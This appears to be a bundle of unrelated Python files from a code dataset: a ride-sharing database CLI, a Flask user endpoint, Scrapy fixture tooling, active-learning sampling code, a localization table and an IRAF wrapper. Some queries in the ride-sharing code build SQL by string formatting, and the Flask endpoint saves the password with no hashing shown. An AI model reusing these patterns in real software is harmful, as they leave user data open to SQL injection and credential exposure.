('%'+keyword+'%','%'+keyword+'%','%'+keyword+'%','%'+keyword+'%',
'%'+keyword+'%','%'+keyword+'%','%'+keyword+'%','%'+keyword+'%',
'%'+keyword+'%','%'+keyword+'%','%'+keyword+'%','%'+keyword+'%'))
result = [[str(item) for item in results] for results in c.fetchall()]
return result
def messageDriver(user):
while True:
rno = raw_input("Please enter the ride where you want to book:(BACK to go back) ")
if rno.upper() == 'BACK':
return
else:
try:
rno = int(rno)
break
except ValueError:
print("Invalid input!")
c.execute("SELECT driver FROM rides WHERE rno = '%d';" % (int(rno)))
email = str(c.fetchone()[0])
msgTimestamp = time.strftime("%Y-%m-%d %H:%M:%S")
while True:
try:
cost = int(raw_input("Please enter your cost: "))
break
except ValueError:
print("Invalid input!")
continue
while True:
try:
seats = int(raw_input("Please enter your seats booked: "))
break
except ValueError:
print("Invalid input!")
continue
c.execute("SELECT lcode FROM locations")
ar = [[str(item) for item in results] for results in c.fetchall()]
pickup = raw_input("Please enter the pickup loc: ")
while [pickup] not in ar:
searchLoc(pickup)
pickup = raw_input("Please enter the pickup loc: ")
dropoff = raw_input("Please enter the dropoff loc: ")
while [dropoff] not in ar:
searchLoc(dst)
dropoff = raw_input("Please enter your dst: ")
content = "cost:"+str(cost) + "; "+"seats:"+str(seats) + "; "+"pickup:"+pickup + "; "+"dropoff: "+dropoff + "; "
seen = 'n'
c.execute("INSERT INTO inbox VALUES (?,?,?,?,?,?)",(email,msgTimestamp,user,content,rno,seen))
conn.commit()
print("message sent!")
def postRequest(user):
c.execute("SELECT ifnull(max(rid),0) FROM requests")
rid = int(c.fetchone()[0])+1
while True:
rdate = raw_input("Please enter the date in YYYY-MM-DD format: ")
try:
time.strptime(rdate,"%Y-%m-%d")
break
except ValueError:
print("Invalid input!")
continue
c.execute("SELECT lcode FROM locations")
ar = [[str(item) for item in results] for results in c.fetchall()]
pickup = raw_input("Please enter the pickup loc: ")
while [pickup] not in ar:
searchLoc(pickup)
pickup = raw_input("Please enter the pickup loc: ")
dropoff = raw_input("Please enter the dropoff loc: ")
while [dropoff] not in ar:
searchLoc(dst)
dropoff = raw_input("Please enter your dst: ")
while True:
try:
amount = int(raw_input("Please enter the amount you are willing to pay per seat: "))
break
except ValueError:
print("Invalid input!")
continue
c.execute("INSERT INTO requests VALUES (?,?,?,?,?,?)",(rid,user,rdate,pickup,dropoff,amount))
conn.commit()
print("Request posted!")
def searchLoc(word):
c.execute("SELECT * FROM locations where lcode like ? or city like ?\
or prov like ? or address like ?;",('%'+word+'%','%'+word+'%','%'+word+'%','%'+word+'%'))
print ("".join('%-13s'%x[0] for x in c.description))
ar = [[str(item) for item in results] for results in c.fetchall()]
prtFive(ar)
def myRequest(user):
c.execute("SELECT * FROM requests where email like ?;",(user,))
print ("".join('%-13s'%x[0] for x in c.description))
ar = [[str(item) for item in results] for results in c.fetchall()]
for row in ar:
print ("".join('%-13s'%x for x in row))
while True:
print("Enter the rid to delete")
rid = raw_input("Or enter Back to go back: ")
try:
rid = int(rid)
c.execute("SELECT * FROM requests WHERE email like '%s' and rid='%d';" % (user,rid))
check_ride = c.fetchone()
if check_ride == None:
print("That's not your request!")
continue
else:
c.execute("DELETE FROM requests WHERE rid = ?;", (rid,))
conn.commit()
print("Request deleted!")
break
except ValueError:
return
def searchRequest(user):
keyword = raw_input("Please enther the pickup location to search: ")
c.execute("SELECT r.* FROM requests r, locations l\
WHERE (r.pickup = l.lcode and (\
l.lcode like ? or l.city like ?\
));",
('%'+keyword+'%','%'+keyword+'%'))
print ("".join('%-13s'%x[0] for x in c.description))
ar = [[str(item) for item in results] for results in c.fetchall()]
prtFive(ar)
print("Enter the rid to select")
rid = raw_input("Or enter Back to go back: ")
if rid.upper() == 'BACK':
return
else:
rid = int(rid)
c.execute("SELECT email FROM requests where rid = ?;",(rid,))
email = str(c.fetchone()[0])
content = raw_input("Enter your message to the person: ")
seen = 'n'
msgTimestamp = time.strftime("%Y-%m-%d %H:%M:%S")
rno = raw_input("Please enter the ride number: ")
c.execute("INSERT INTO inbox VALUES (?,?,?,?,?,?)",(email,msgTimestamp,user,content,rno,seen))
conn.commit()
print("Message sent!")
def prtFive(ar):
start = 5
for row in ar[0:start]:
print ("".join('%-13s'%x for x in row))
while len(ar)>5:
option = raw_input("enter Y to see more: ")
if option.upper() == 'Y':
end = start+5
if end > len(ar):
for row in ar[start:len(ar)]:
print ("".join('%-13s'%x for x in row))
break
else:
for row in ar[start:end]:
print ("".join('%-13s'%x for x in row))
start = end
else:
break
main()
| StarcoderdataPython |
8231 | <reponame>davidhozic/Discord-Shiller
"""
~ Tracing ~
This modules containes functions and classes
related to the console debug long or trace.
"""
from enum import Enum, auto
import time
__all__ = (
"TraceLEVELS",
"trace"
)
m_use_debug = None
class TraceLEVELS(Enum):
"""
Info: Level of trace for debug
"""
NORMAL = 0
WARNING = auto()
ERROR = auto()
def trace(message: str,
level: TraceLEVELS = TraceLEVELS.NORMAL):
""""
Name : trace
Param:
- message : str = Trace message
- level : TraceLEVELS = Level of the trace
"""
if m_use_debug:
timestruct = time.localtime()
timestamp = "Date: {:02d}.{:02d}.{:04d} Time:{:02d}:{:02d}"
timestamp = timestamp.format(timestruct.tm_mday,
timestruct.tm_mon,
timestruct.tm_year,
timestruct.tm_hour,
timestruct.tm_min)
l_trace = f"{timestamp}\nTrace level: {level.name}\nMessage: {message}\n"
print(l_trace)
| StarcoderdataPython |
149900 | import pickle
import sys
import zlib
from scrapy.crawler import Crawler
from scrapy.utils.conf import build_component_list
from scrapy.utils.project import get_project_settings
from .utils import get_spider_class
class Cassette:
"""
Helper class to store request, response and output data.
"""
FIXTURE_VERSION = 2
def __init__(
self,
spider=None,
spider_name=None,
request=None,
response=None,
init_attrs=None,
input_attrs=None,
output_attrs=None,
output_data=None,
middlewares=None,
included_settings=None,
python_version=None,
filename=None,
):
self.spider_name = spider_name
self.middlewares = middlewares
self.included_settings = included_settings
if spider:
self.spider_name = spider.name
self.middlewares = self._get_middlewares(spider.settings)
self.included_settings = self._get_included_settings(spider.settings)
self.request = request
self.response = response
self.init_attrs = init_attrs
self.input_attrs = input_attrs
self.output_attrs = output_attrs
self.output_data = output_data
self.filename = filename
self.python_version = python_version or sys.version_info.major
@classmethod
def from_fixture(cls, fixture):
with open(fixture, 'rb') as f:
binary = f.read()
cassette = pickle.loads(zlib.decompress(binary))
return cassette
def _get_middlewares(self, settings):
full_list = build_component_list(settings.getwithbase('SPIDER_MIDDLEWARES'))
autounit_mw_path = list(filter(lambda x: x.endswith('AutounitMiddleware'), full_list))[0]
start = full_list.index(autounit_mw_path)
mw_paths = [mw for mw in full_list[start:] if mw != autounit_mw_path]
return mw_paths
def _get_included_settings(self, settings):
# Use the new setting, if empty, try the deprecated one
names = settings.getlist('AUTOUNIT_RECORD_SETTINGS', [])
if not names:
names = settings.getlist('AUTOUNIT_INCLUDED_SETTINGS', [])
included = {name: settings.get(name) for name in names}
return included
def get_spider(self):
settings = get_project_settings()
spider_cls = get_spider_class(self.spider_name, settings)
spider_cls.update_settings(settings)
for k, v in self.included_settings.items():
settings.set(k, v, priority=50)
crawler = Crawler(spider_cls, settings)
spider = spider_cls.from_crawler(crawler, **self.init_attrs)
return spider
def pack(self):
return zlib.compress(pickle.dumps(self, protocol=2))
def to_dict(self):
return {
'spider_name': self.spider_name,
'request': self.request,
'response': self.response,
'output_data': self.output_data,
'middlewares': self.middlewares,
'settings': self.included_settings,
'init_attrs': self.init_attrs,
'input_attrs': self.input_attrs,
'output_attrs': self.output_attrs,
}
| StarcoderdataPython |
4817896 | <reponame>VKCOM/TopicsDataset
from typing import Union, Tuple
import math
import numpy as np
from sklearn.cluster import KMeans
from modAL.utils import multi_argmax
from modAL.models.base import BaseLearner, BaseCommittee
from sklearn.exceptions import NotFittedError
from modAL.utils.data import modALinput
from sklearn.base import BaseEstimator
import scipy.sparse as sp
from scipy.stats import entropy
def get_least_confidence(predictions):
return 1 - np.max(predictions, axis=1)
def get_margin(predictions):
part = np.partition(-predictions, 1, axis=1)
margin = - part[:, 0] + part[:, 1]
return -margin
def get_entropy(predictions):
return np.transpose(entropy(np.transpose(predictions)))
uncertainty_measure_dict = {
'least_confident': get_least_confidence,
'margin': get_margin,
'entropy': get_entropy
}
def predict_by_committee(classifier: BaseEstimator, X: modALinput, cmt_size=10, **predict_proba_kwargs) -> np.ndarray:
predictions = []
for _ in range(cmt_size):
try:
predictions.append(classifier.predict_proba(X, with_dropout=True, **predict_proba_kwargs))
except NotFittedError:
return np.ones(shape=(X.shape[0],))
return np.array(predictions)
def qbc_uncertainty_sampling(
classifier: Union[BaseLearner, BaseCommittee],
X: Union[np.ndarray, sp.csr_matrix],
n_instances: int = 20,
cmt_size: int = 10,
uncertainty_measure='entropy',
**dropout_uncertainty_kwargs
) -> Tuple[np.ndarray, Union[np.ndarray, sp.csr_matrix, list]]:
if uncertainty_measure not in uncertainty_measure_dict:
raise ValueError('uncertainty measure can be equal only to "least_confident", "margin" or "entropy"')
committee_predictions = predict_by_committee(
classifier=classifier,
X=X,
cmt_size=cmt_size,
**dropout_uncertainty_kwargs
)
uncertainty = uncertainty_measure_dict[uncertainty_measure](np.mean(committee_predictions, axis=0))
query_idx = multi_argmax(uncertainty, n_instances=n_instances)
if isinstance(X, list) and isinstance(X[0], np.ndarray):
new_batch = [x[query_idx] for x in X]
else:
new_batch = X[query_idx]
return query_idx, new_batch
dis_func = np.vectorize(lambda x: 0 if x == 0 else x * math.log(x))
def get_disagreement(committee_predictions, committee_size):
# 0 for members of committee, -1 for classes
disagreement = np.sum(dis_func(committee_predictions), axis=(0, -1)) / committee_size
return disagreement
def bald_sampling(
classifier: Union[BaseLearner, BaseCommittee],
X: Union[np.ndarray, sp.csr_matrix],
n_instances: int = 20,
cmt_size: int = 10,
uncertainty_measure='entropy',
**dropout_uncertainty_kwargs
) -> Tuple[np.ndarray, Union[np.ndarray, sp.csr_matrix, list]]:
if uncertainty_measure not in uncertainty_measure_dict:
raise ValueError('uncertainty measure can be equal only to "least_confident", "margin" or "entropy"')
committee_predictions = predict_by_committee(
classifier=classifier,
X=X,
cmt_size=cmt_size,
**dropout_uncertainty_kwargs
)
uncertainty = uncertainty_measure_dict[uncertainty_measure](np.mean(committee_predictions, axis=0))
disagreement = get_disagreement(committee_predictions, cmt_size)
query_idx = multi_argmax(uncertainty + disagreement, n_instances=n_instances)
if isinstance(X, list) and isinstance(X[0], np.ndarray):
new_batch = [x[query_idx] for x in X]
else:
new_batch = X[query_idx]
return query_idx, new_batch
def bald_modal_sampling(
classifier: Union[BaseLearner, BaseCommittee],
X: Union[np.ndarray, sp.csr_matrix],
n_instances: int = 20,
with_dropout=True,
**dropout_uncertainty_kwargs
) -> Tuple[np.ndarray, Union[np.ndarray, sp.csr_matrix, list]]:
img_predictions = classifier.predict_proba([X[0], np.zeros_like(X[1])], with_dropout=with_dropout)
txt_predictions = classifier.predict_proba([np.zeros_like(X[0]), X[1]], with_dropout=with_dropout)
both_predictions = classifier.predict_proba(X, with_dropout=with_dropout)
committee_predictions = [img_predictions, txt_predictions, both_predictions]
uncertainty = get_entropy(np.mean(committee_predictions, axis=0))
disagreement = get_disagreement(committee_predictions, 3)
query_idx = multi_argmax(uncertainty + disagreement, n_instances=n_instances)
if isinstance(X, list) and isinstance(X[0], np.ndarray):
new_batch = [x[query_idx] for x in X]
else:
new_batch = X[query_idx]
return query_idx, new_batch
def get_bald_trident_measure(classifier, X, with_dropout, cmt_size):
committee_predictions = []
for i in range(cmt_size):
common_predictions, img_predictions, txt_predictions = classifier.predict_proba(X, with_dropout=with_dropout)
committee_predictions.append(common_predictions)
committee_predictions.append(img_predictions)
committee_predictions.append(txt_predictions)
uncertainty = get_entropy(np.mean(committee_predictions, axis=0))
disagreement = get_disagreement(committee_predictions, cmt_size * 3)
print('uncertainty:', uncertainty[:10])
print('disagreement:', disagreement[:10])
return uncertainty + disagreement
def bald_trident_sampling(
classifier: Union[BaseLearner, BaseCommittee],
X: Union[np.ndarray, sp.csr_matrix],
n_instances: int = 20,
with_dropout=False,
cmt_size=1,
**dropout_uncertainty_kwargs
) -> Tuple[np.ndarray, Union[np.ndarray, sp.csr_matrix, list]]:
bald_trident_measure = get_bald_trident_measure(
classifier=classifier,
X=X,
with_dropout=with_dropout,
cmt_size=cmt_size
)
query_idx = multi_argmax(bald_trident_measure, n_instances=n_instances)
if isinstance(X, list) and isinstance(X[0], np.ndarray):
new_batch = [x[query_idx] for x in X]
else:
new_batch = X[query_idx]
return query_idx, new_batch
def bald_trident_cluster_sampling(
classifier: Union[BaseLearner, BaseCommittee],
X: Union[np.ndarray, sp.csr_matrix],
n_instances: int = 20,
with_dropout=False,
cmt_size=1,
transform=(lambda x:x[0]),
**dropout_uncertainty_kwargs
) -> Tuple[np.ndarray, Union[np.ndarray, sp.csr_matrix, list]]:
bald_trident_measure = get_bald_trident_measure(
classifier=classifier,
X=X,
with_dropout=with_dropout,
cmt_size=cmt_size
)
if transform is not None:
X = transform(X)
km = KMeans(n_clusters=n_instances)
km.fit(X)
batch = []
for label in range(n_instances):
idx = np.where(km.labels_ == label)[0]
max_entropy = 0
max_i = 0
for i in idx:
if bald_trident_measure[i] > max_entropy:
max_entropy = bald_trident_measure[i]
max_i = i
batch.append(max_i)
query_idx = np.array(batch)
if isinstance(X, list) and isinstance(X[0], np.ndarray):
new_batch = [x[query_idx] for x in X]
else:
new_batch = X[query_idx]
return query_idx, new_batch
def bald_trident_based_sampling(
classifier: Union[BaseLearner, BaseCommittee],
X: Union[np.ndarray, sp.csr_matrix],
cmt_size=3,
n_instances: int = 20,
**kwargs
) -> Tuple[np.ndarray, Union[np.ndarray, sp.csr_matrix, list]]:
committee_predictions = []
for _ in range(cmt_size):
committee_predictions.append(classifier.predict_proba(X, with_dropout=True)[0])
uncertainty = get_entropy(np.mean(committee_predictions, axis=0))
disagreement = get_disagreement(committee_predictions, 3)
query_idx = multi_argmax(uncertainty + disagreement, n_instances=n_instances)
if isinstance(X, list) and isinstance(X[0], np.ndarray):
new_batch = [x[query_idx] for x in X]
else:
new_batch = X[query_idx]
return query_idx, new_batch
def bald_trident_bn(
classifier: Union[BaseLearner, BaseCommittee],
X: Union[np.ndarray, sp.csr_matrix],
n_instances: int = 20,
cmt_size=1,
**dropout_uncertainty_kwargs
):
committee_predictions = []
for i in range(cmt_size):
common_predictions, img_predictions, txt_predictions = classifier.predict_proba(X, with_dropout=True)
committee_predictions.append(common_predictions)
committee_predictions.append(img_predictions)
committee_predictions.append(txt_predictions)
committee_predictions = np.array(committee_predictions)
n = committee_predictions.shape[2]
uncertainty = []
for i in range(X[0].shape[0]):
cov = np.ones((n, n))
mean_prediction = committee_predictions[:, i].mean(axis=0)
cov -= mean_prediction.reshape(-1, 1) * mean_prediction
for j in range(cmt_size):
cov += committee_predictions[j][i].reshape(-1, 1) * committee_predictions[j][i] / cmt_size
uncertainty.append(np.linalg.det(cov))
query_idx = multi_argmax(np.array(uncertainty), n_instances=n_instances)
if isinstance(X, list) and isinstance(X[0], np.ndarray):
new_batch = [x[query_idx] for x in X]
else:
new_batch = X[query_idx]
return query_idx, new_batch
def bald_trident_based_bn(
classifier: Union[BaseLearner, BaseCommittee],
X: Union[np.ndarray, sp.csr_matrix],
n_instances: int = 20,
cmt_size=1,
**dropout_uncertainty_kwargs
):
committee_predictions = []
for _ in range(cmt_size):
committee_predictions.append(classifier.predict_proba(X, with_dropout=True)[0])
committee_predictions = np.array(committee_predictions)
n = committee_predictions.shape[2]
uncertainty = []
for i in range(X[0].shape[0]):
cov = np.ones((n, n))
mean_prediction = committee_predictions[:, i].mean(axis=0)
cov -= mean_prediction.reshape(-1, 1) * mean_prediction
for j in range(cmt_size):
cov += committee_predictions[j][i].reshape(-1, 1) * committee_predictions[j][i] / cmt_size
uncertainty.append(np.linalg.det(cov))
query_idx = multi_argmax(np.array(uncertainty), n_instances=n_instances)
if isinstance(X, list) and isinstance(X[0], np.ndarray):
new_batch = [x[query_idx] for x in X]
else:
new_batch = X[query_idx]
return query_idx, new_batch | StarcoderdataPython |
10352 | import json
from flask import request
from flask_restful import Resource, abort, reqparse
from models.User import User
"""
POST Creates a new resource.
GET Retrieves a resource.
PUT Updates an existing resource.
DELETE Deletes a resource.
"""
class UserEndpoint(Resource):
def post(self):
j = request.get_json()
# need to ensure the required fields are in the json
if "name" not in j:
abort(422, message="name is not in json body")
else:
name = j["name"]
if "username" not in j:
abort(422, message="username not in json body")
else:
username = j["username"]
if "email" not in j:
abort(422, message="email not in json body")
else:
email = j["email"]
if "password" not in j:
abort(422, message="password not in json body")
else:
password = j["password"]
user_obj = User(
name=name,
username=username,
email=email,
password=password,
)
if "phone_number" in j:
user_obj.phone_number = j["phone_number"]
if "experience" in j:
user_obj.experience = j["experience"]
if "pictureURL" in j:
user_obj.pictureURL = j["pictureURL"]
d = user_obj.save()
return json.loads(d.to_json())
def put(self):
# TODO
pass
def delete(self):
# TODO
pass
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('username', required=True, type=str, help='The username of the User')
args = parser.parse_args()
try:
user = json.loads(User.objects.get(username=args['username']).to_json())
except Exception as e:
print(e)
abort(404, message="User doesnt exist: {} doesn't exist".format(args['username']))
return user
| StarcoderdataPython |
1716244 | from . import view
from . import byte
from . import files
| StarcoderdataPython |
33207 | """
Creates files for end-to-end tests
python util/build_tests.py
"""
# stdlib
import json
from dataclasses import asdict
# module
import avwx
def make_metar_test(station: str) -> dict:
"""
Builds METAR test file for station
"""
m = avwx.Metar(station)
m.update()
# Clear timestamp due to parse_date limitations
m.data.time = None
return {
"data": asdict(m.data),
"translations": asdict(m.translations),
"summary": m.summary,
"speech": m.speech,
"station_info": asdict(m.station_info),
}
def make_taf_test(station: str, report: str = None) -> dict:
"""
Builds TAF test file for station
"""
t = avwx.Taf(station)
t.update(report)
data = asdict(t.data)
# Clear timestamp due to parse_date limitations
for key in ("time", "start_time", "end_time"):
data[key] = None
for i in range(len(data["forecast"])):
for key in ("start_time", "end_time"):
data["forecast"][i][key] = None
return {
"data": data,
"translations": asdict(t.translations),
"summary": t.summary,
"speech": t.speech,
"station_info": asdict(t.station_info),
}
def make_pirep_test(station: str) -> [dict]:
"""
Builds PIREP test file for station
"""
p = avwx.Pireps(station)
p.update()
ret = []
if not p.data:
return
for report in p.data:
# Clear timestamp due to parse_date limitations
report.time = None
ret.append({"data": asdict(report)})
return {"reports": ret, "station_info": asdict(p.station_info)}
if __name__ == "__main__":
from pathlib import Path
for target in ("metar", "taf", "pirep"):
for station in ("KJFK", "KMCO", "PHNL", "EGLL"):
data = locals()[f"make_{target}_test"](station)
if data:
path = Path("tests", target, station + ".json")
json.dump(data, path.open("w"), indent=4, sort_keys=True)
| StarcoderdataPython |
1665072 | <gh_stars>0
"""
This file is used for fast operations on localization. It consists of a list of all the languages on its own language,
language_codes and translation of all the text in the app into some language.
"""
langs = [
"afrikaans", "shqiptar", "አማርኛ", "عربى", "հայերեն", "Azərbaycan", "basque", "беларускі", "বাংলা",
"bosanski", "български", "català", "cebuano", "Chichewa", "简体中文", "中國傳統的", "Corsu", "Hrvatski",
"čeština", "dansk", "Nederlands", "english", "esperanto", "eesti", "filipino", "Suomalainen", "français",
"Frysk", "galician", "ქართული", "Deutsche", "Ελληνικά", "ગુજરાતી", "ayisyen kreyòl", "Hausa",
"Ōlelo Hawaiʻi", "עִברִית", "עִברִית", "हिंदी", "hmong", "Magyar", "icelandic", "igbo", "bahasa Indonesia",
"Gaeilge", "italiano", "日本語", "javanese", "ಕನ್ನಡ", "Қазақ", "ខ្មែរ", "한국어", "Kurdish (Kurmanji)",
"Кыргызча", "ລາວ", "Latine", "Latvijas", "Lietuvos", "Lëtzebuergesch", "македонски", "Malagasy", "malay",
"മലയാളം", "maltese", "maori", "मराठी", "монгол", "မြန်မာ (ဗမာ)", "नेपाली", "norsk", "ଓଡ଼ିଆ", "پښتو", "فارسی",
"Polskie", "português", "ਪੰਜਾਬੀ", "Română", "русский", "Samoa", "Gàidhlig", "Српски", "Sesotho", "shona",
"سنڌي", "සිංහල", "slovenský", "Slovenščina", "somali", "Español", "tembang sunda", "swahili", "svenska",
"тоҷик", "தமிழ்", "తెలుగు", "ไทย", "Türk", "український", "اردو", "ئۇيغۇر", "uzbek", "Tiếng Việt",
"Cymraeg", "isiXhosa", "ייִדיש", "Yoruba", "zulu"
]
codes = [
"af", "sq", "am", "ar", "hy", "az", "eu", "be", "bn", "bs", "bg", "ca", "ceb", "ny", "zh-cn", "zh-tw", "co", "hr",
"cs", "da", "nl", "en", "eo", "et", "tl", "fi", "fr", "fy", "gl", "ka", "de", "el", "gu", "ht", "ha", "haw", "iw",
"he", "hi", "hmn", "hu", "is", "ig", "id", "ga", "it", "ja", "jw", "kn", "kk", "km", "ko", "ku", "ky", "lo", "la",
"lv", "lt", "lb", "mk", "mg", "ms", "ml", "mt", "mi", "mr", "mn", "my", "ne", "no", "or", "ps", "fa", "pl", "pt",
"pa", "ro", "ru", "sm", "gd", "sr", "st", "sn", "sd", "si", "sk", "sl", "so", "es", "su", "sw", "sv", "tg", "ta",
"te", "th", "tr", "uk", "ur", "ug", "uz", "vi", "cy", "xh", "yi", "yo", "zu"
]
ans = {
"af": ["begin", "instellings", "selfmoord", "terug"],
"sq": ["fillim", "Cilësimet", "vetëvrasje", "prapa"],
"am": ["መጀመሪያ", "ቅንብሮች", "ራስን መግደል", "ወደኋላ"],
"ar": ["بداية", "إعدادات", "انتحار", "عودة"],
"hy": ["սկիզբ", "Կարգավորումներ", "ինքնասպանություն", "Վերադառնալ"],
"az": ["Başlamaq", "Settings", "intihar", "geri"],
"eu": ["start", "ezarpenak", "Suicide", "Back"],
"be": ["пачатак", "налады", "самазабойца", "назад"],
"bn": ["শুরু", "সেটিংস", "আত্মহত্যা", "পেছনে"],
"bs": ["start", "Postavke", "samoubistvo", "natrag"],
"bg": ["начало", "Настройки", "самоубийство", "обратно"],
"ca": ["Començar", "ajustos", "suïcidi", "esquena"],
"ceb": ["Start", "setting", "paghikog", "balik"],
"ny": ["Start", "Zikhazikiko", "kudzipha", "Back"],
"zh-cn": ["开始", "设置", "自杀", "后退"],
"zh-tw": ["開始", "設置", "自殺", "後退"],
"co": ["Start", "Settings", "Mariposa", "Torna"],
"hr": ["Početak", "postavke", "samoubistvo", "leđa"],
"cs": ["Start", "Nastavení", "Sebevražda", "Zadní"],
"da": ["Start", "Indstillinger", "Selvmord", "Tilbage"],
"nl": ["Begin", "instellingen", "Zelfmoord", "Terug"],
"en": ["Start", "Settings", "Suicide", "Back"],
"eo": ["komenco", "Agordoj", "memmortigo", "reen"],
"et": ["algus", "seaded", "enesetapp", "tagasi"],
"tl": ["simula", "Mga Setting", "pagpapakamatay", "likod"],
"fi": ["alkaa", "asetukset", "Itsemurha", "Takaisin"],
"fr": ["Démarrer", "Paramètres", "Suicide", "Dos"],
"fy": ["Start", "ynstellings", "Selsmoard", "Rêch"],
"gl": ["comezo", "configuración", "suicidio", "de volta"],
"ka": ["დაწყება", "პარამეტრები", "Suicide", "უკან"],
"de": ["Start", "die Einstellungen", "Selbstmord", "Zurück"],
"el": ["Αρχή", "Ρυθμίσεις", "Αυτοκτονία", "Πίσω"],
"gu": ["શરૂઆત", "સેટિંગ્સ", "આત્મઘાતી", "પાછા"],
"ht": ["Kòmanse", "anviwònman", "swisid", "Retounen"],
"ha": ["Fara", "Saituna", "Kashe Kanta", "baya"],
"haw": ["Ka hoʻomaka '", "palapala koho", "he pepehi anaʻia iā iho", "Back"],
"iw": ["הַתחָלָה", "הגדרות", "הִתאַבְּדוּת", "חזור"],
"he": ["הַתחָלָה", "הגדרות", "הִתאַבְּדוּת", "חזור"],
"hi": ["शुरू", "समायोजन", "आत्मघाती", "वापस"],
"hmn": ["Start", "chaw", "yus tua yus", "Rov qab"],
"hu": ["Rajt", "Beállítások", "Öngyilkosság", "Vissza"],
"is": ["Start", "Stillingar", "sjálfsvíg", "Back"],
"ig": ["Malite", "Settings", "igbu onwe", "Back"],
"id": ["Mulailah", "pengaturan", "Bunuh diri", "Kembali"],
"ga": ["Tosaigh", "Socruithe", "Féinmharú", "Ar ais"],
"it": ["Inizio", "impostazioni", "Suicidio", "Indietro"],
"ja": ["開始", "設定", "自殺", "バック"],
"jw": ["Mulai", "Setelan", "lampus", "Back"],
"kn": ["ಪ್ರಾರಂಭಿಸಿ", "ಸಂಯೋಜನೆಗಳು", "ಸುಸೈಡ್", "ಬ್ಯಾಕ್"],
"kk": ["бастау", "Параметрлер", "Суицид", "артқа"],
"km": ["ចាប់ផ្តើម", "ការកំណត់", "ការធ្វើអត្តឃាត", "ត្រលប់ក្រោយ"],
"ko": ["스타트", "설정", "자살", "뒤"],
"ku": ["Destpêkirin", "Mîhengên", "Xwekûştinî", "Paş"],
"ky": ["баштоо", "Орнотуулар", "өзүн өзү өлтүрүү", "кайра"],
"lo": ["ເລີ່ມຕົ້ນ", "ການຕັ້ງຄ່າ", "suicide", "ກັບຄືນໄປບ່ອນ"],
"la": ["initium", "Optiones", "mortem", "Back"],
"lv": ["Sākt", "Iestatījumi", "pašnāvība", "atpakaļ"],
"lt": ["pradžia", "Nustatymai", "savižudybė", "atgal"],
"lb": ["Start", "Astellunge", "ëmbruecht", "Back"],
"mk": ["почеток", "Подесувања", "самоубиството", "назад"],
"mg": ["fanombohana", "Fikirana", "Mamono Tena", "indray"],
"ms": ["Start", "tetapan", "bunuh diri", "Kembali"],
"ml": ["തുടക്കം", "ക്രമീകരണങ്ങൾ", "ആത്മഹത്യ", "തിരികെ"],
"mt": ["bidu", "settings", "suwiċidju", "lura"],
"mi": ["Tīmata", "tautuhinga", "whakamomori", "Hoki"],
"mr": ["प्रारंभ", "सेटिंग्ज", "आत्महत्या", "मागे"],
"mn": ["Start", "Тохиргоо", "амиа хорлох", "Буцах Give"],
"my": ["စတင်", "Settings များ", "မိမိကိုယ်မိမိသတ်သေခြင်း", "ပြန်."],
"ne": ["सुरु", "सेटिङहरू", "आत्महत्या", "फिर्ता"],
"no": ["Start", "innstillinger", "Selvmord", "Tilbake"],
"or": ["ଆରମ୍ଭ", "ସେଟିଂସମୂହ", "ଆତ୍ମହତ୍ଯା", "ପିଠି"],
"ps": ["د پیل", "امستنې", "ځانمرګي", "Back"],
"fa": ["شروع", "تنظیمات", "خودکشی کردن", "بازگشت"],
"pl": ["Początek", "Ustawienia", "Samobójstwo", "Z powrotem"],
"pt": ["Começar", "Definições", "Suicídio", "Voltar"],
"pa": ["ਸ਼ੁਰੂ", "ਸੈਟਿੰਗ", "ਖੁਦਕੁਸ਼ੀ", "ਵਾਪਸ"],
"ro": ["start", "Setări", "Sinucidere", "Înapoi"],
"ru": ["Начинать", "Настройки", "самоубийца", "Назад"],
"sm": ["āmata", "tulaga", "tōaʻi", "tua"],
"gd": ["Start", "Roghainnean", "Suicide", "Back"],
"sr": ["Почетак", "Подешавања", "самоубиство", "Назад"],
"st": ["Qala", "Litlhophiso", "ho ipolaea", "morao"],
"sn": ["kutanga", "Settings", "kuzvisungirira", "shure"],
"sd": ["شروع", "جوڙ", "آپگهات", "واپس"],
"si": ["ආරම්භයක්", "සැකසුම්", "මරාගෙන මැරෙන", "ආපසු"],
"sk": ["štart", "nastavenie", "samovražda", "späť"],
"sl": ["Začetek", "Nastavitve", "samomor", "Nazaj"],
"so": ["Start", "Settings", "ismiidaamin ah", "Back"],
"es": ["Comienzo", "Ajustes", "Suicidio", "atrás"],
"su": ["ngamimitian", "setélan", "maehan maneh", "balik deui"],
"sw": ["Start", "mipangilio", "Suicide", "Back"],
"sv": ["Start", "inställningar", "Självmord", "Tillbaka"],
"tg": ["Оғоз", "Танзимот", "худкушӣ", "Бозгашт"],
"ta": ["தொடக்கம்", "அமைப்புகள்", "தற்கொலை", "மீண்டும்"],
"te": ["ప్రారంభం", "సెట్టింగులు", "ఆత్మహత్య", "తిరిగి"],
"th": ["เริ่มต้น", "การตั้งค่า", "การฆ่าตัวตาย", "กลับ"],
"tr": ["Başlat", "Ayarlar", "İntihar", "Geri"],
"uk": ["початок", "настройки", "самогубець", "назад"],
"ur": ["شروع کریں", "ترتیبات", "خودکش", "پیچھے"],
"ug": ["жүргүзмәк", "تەڭشەكلىرى", "өз-өзини өлтүрүш", "قايتىپ"],
"uz": ["boshlanish", "Sozlamalar", "o'zini o'zi o'ldirish", "orqaga"],
"vi": ["Khởi đầu", "Cài đặt", "tự vận", "Trở lại"],
"cy": ["Dechrau", "gosodiadau", "hunanladdiad", "Yn ôl"],
"xh": ["Qala", "izicwangciso", "ukuzibulala", "buyela umva"],
"yi": ["אָנהייב", "סעטטינגס", "זעלבסטמאָרד", "צוריק"],
"yo": ["Bẹrẹ", "Ètò", "ara", "Back"],
"zu": ["Qala", "Amasethingi", "Ukuzibulala", "Emuva"],
}
| StarcoderdataPython |
3346766 | <reponame>iraf-community/stsdas
from __future__ import print_function
import iraf
import os
no = iraf.no
yes = iraf.yes
from nictools import rnlincor
# Point to default parameter file for task
_parfile = 'nicmos$rnlincor.par'
_taskname = 'rnlincor'
######
# Set up Python IRAF interface here
######
def rnlincor_iraf(input,output,nozpcorr):
#Grab the iraf symbolset & stuff them in the environment variable.
if 'nref' not in os.environ:
os.environ['nref']=iraf.osfn('nref$')
if 'nicmos' not in os.environ:
os.environ['nicmos']=iraf.osfn('nicmos$')
#Handle optional file specifications
opt={'nozpcorr':nozpcorr}
#Run the task.
try:
rnlincor.run(input,output,**opt)
except ValueError as e:
print("ValueError: ",str(e))
except KeyError as e:
print("KeyError: ",str(e))
# Setup rnlincor as an IRAF task here
# by setting up an absolute path to the parfile...
parfile = iraf.osfn(_parfile)
